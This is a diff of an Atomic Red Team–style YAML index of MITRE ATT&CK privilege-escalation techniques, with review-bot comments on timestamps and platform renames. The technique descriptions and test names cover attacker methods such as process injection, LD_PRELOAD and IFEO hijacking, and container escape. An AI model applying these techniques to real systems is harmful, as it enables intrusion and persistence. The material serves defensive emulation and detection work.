- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests:
- name: Thread Execution Hijacking
@@ -36878,7 +37213,7 @@ privilege-escalation:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
@@ -36933,8 +37268,6 @@ privilege-escalation:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests:
- name: Application Shim Installation
@@ -37023,7 +37356,7 @@ privilege-escalation:
elevation_required: true
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
@@ -37084,9 +37417,9 @@ privilege-escalation:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -37095,7 +37428,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests:
- name: Add Port Monitor persistence in Registry
@@ -37172,7 +37504,7 @@ privilege-escalation:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -37193,7 +37525,6 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests:
- name: Logon Scripts - Mac
@@ -37214,7 +37545,7 @@ privilege-escalation:
name: manual
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
@@ -37317,7 +37648,6 @@ privilege-escalation:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests:
- name: Shellcode execution via VBA
@@ -37824,7 +38154,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1611
atomic_tests:
- name: Deploy container using nsenter container escape
@@ -37993,7 +38322,7 @@ privilege-escalation:
rmdir #{mount_point}
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -38006,7 +38335,6 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -38019,7 +38347,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -38049,7 +38376,8 @@ privilege-escalation:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests:
- name: Shortcut Modification
@@ -38127,7 +38455,7 @@ privilege-escalation:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -38153,8 +38481,6 @@ privilege-escalation:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests:
- name: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider
@@ -38198,7 +38524,7 @@ privilege-escalation:
elevation_required: true
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -38275,7 +38601,6 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests:
- name: Launch Daemon
@@ -38361,7 +38686,7 @@ privilege-escalation:
sudo rm /tmp/T1543_004_atomicredteam.txt
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -38380,6 +38705,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -38387,7 +38713,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -38407,29 +38732,31 @@ privilege-escalation:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests:
- name: powerShell Persistence via hijacking default modules - Get-Variable.exe
@@ -38450,7 +38777,7 @@ privilege-escalation:
name: powershell
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
@@ -38486,6 +38813,10 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -38497,16 +38828,12 @@ privilege-escalation:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
@@ -38542,12 +38869,12 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -38555,9 +38882,8 @@ privilege-escalation:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests:
- name: LockBit Black - Modify Group policy settings -cmd
@@ -38613,7 +38939,7 @@ privilege-escalation:
elevation_required: true
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -38628,6 +38954,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -38636,18 +38963,18 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
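Review bot: Derived per-platform indexes or matrices keyed by `Azure AD`, `Office 365` or `Google Workspace` will no longer match T1078.001 once it lists only `Office Suite` and `Identity Provider` (the same swap recurs below for T1548, T1548.005, T1098.005 and T1098.001). Check that those derived files are regenerated in the same change and that the atomic tests attached to these techniques still resolve to a platform the generator knows about, otherwise the tests silently disappear from the old platform views.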
@@ -38679,9 +39006,6 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests:
- name: Enable Guest account with RDP capability and admin privileges
@@ -38831,7 +39155,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests:
- name: Create a new time provider
@@ -38910,7 +39233,7 @@ privilege-escalation:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
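Review bot: `modified` moves backwards here, from 2021-04-29 to 2020-03-24, and the same regression appears below for T1574.006, T1134.002, T1548.001, T1546.012, T1055.013, T1574.005, T1546.008, T1055.004, T1546.009, T1055.002 and T1547.015. A `modified` timestamp going backwards normally means the index was rebuilt from an older STIX source, so please state which ATT&CK release the generator pulled. The old values all share the same `.188Z` millisecond stamp across unrelated techniques, which suggests they were bulk-assigned placeholders and the new values are the genuine upstream ones, but that reasoning belongs in the PR description rather than being left for the reader to infer.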
@@ -38936,8 +39259,6 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests:
- name: Trap EXIT
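Review bot: T1546.005 ends up with no `x_mitre_attack_spec_version` at all once the `2.1.0` line goes (likewise T1546.012, T1055.013, T1574.005, T1055.004, T1546.009, T1055.002 and T1547.015 later in the diff), while the objects on 3.1.0 and 3.2.0 keep theirs. Either consumers that read that key must treat it as optional, or the generator should emit the upstream value for these older objects too; it is worth stating which of the two this change intends.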
@@ -39028,7 +39349,7 @@ privilege-escalation:
name: sh
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -39149,7 +39470,6 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests:
- name: Shared Library Injection via /etc/ld.so.preload
@@ -39270,7 +39590,7 @@ privilege-escalation:
elevation_required: false
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -39302,11 +39622,10 @@ privilege-escalation:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -39347,11 +39666,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
@@ -39407,7 +39725,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests:
- name: Access Token Manipulation
@@ -39441,7 +39758,7 @@ privilege-escalation:
name: powershell
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -39498,7 +39815,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests:
- name: Make and modify binary from C source
@@ -39783,7 +40099,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests:
- name: Winlogon Shell Key Persistence - PowerShell
@@ -40016,7 +40331,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests:
- name: Modify SSH Authorized Keys
@@ -40089,7 +40403,7 @@ privilege-escalation:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -40122,8 +40436,6 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests:
- name: IFEO Add Debugger
@@ -40224,7 +40536,7 @@ privilege-escalation:
elevation_required: true
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -40286,10 +40598,9 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -40347,7 +40658,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -40389,7 +40699,7 @@ privilege-escalation:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -40448,8 +40758,6 @@ privilege-escalation:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.005:
technique:
@@ -40479,7 +40787,7 @@ privilege-escalation:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -40514,12 +40822,10 @@ privilege-escalation:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -40596,7 +40902,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests:
- name: Attaches Command Prompt as a Debugger to a List of Target Processes
@@ -40768,7 +41073,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -40817,8 +41122,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests:
- name: Process Injection via C#
@@ -40937,7 +41240,7 @@ privilege-escalation:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -40985,8 +41288,6 @@ privilege-escalation:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests:
- name: Create registry persistence via AppCert DLL
@@ -41031,7 +41332,7 @@ privilege-escalation:
elevation_required: true
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -41044,16 +41345,16 @@ privilege-escalation:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -41065,16 +41366,16 @@ privilege-escalation:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
@@ -41129,7 +41430,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.002:
technique:
@@ -41152,7 +41452,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
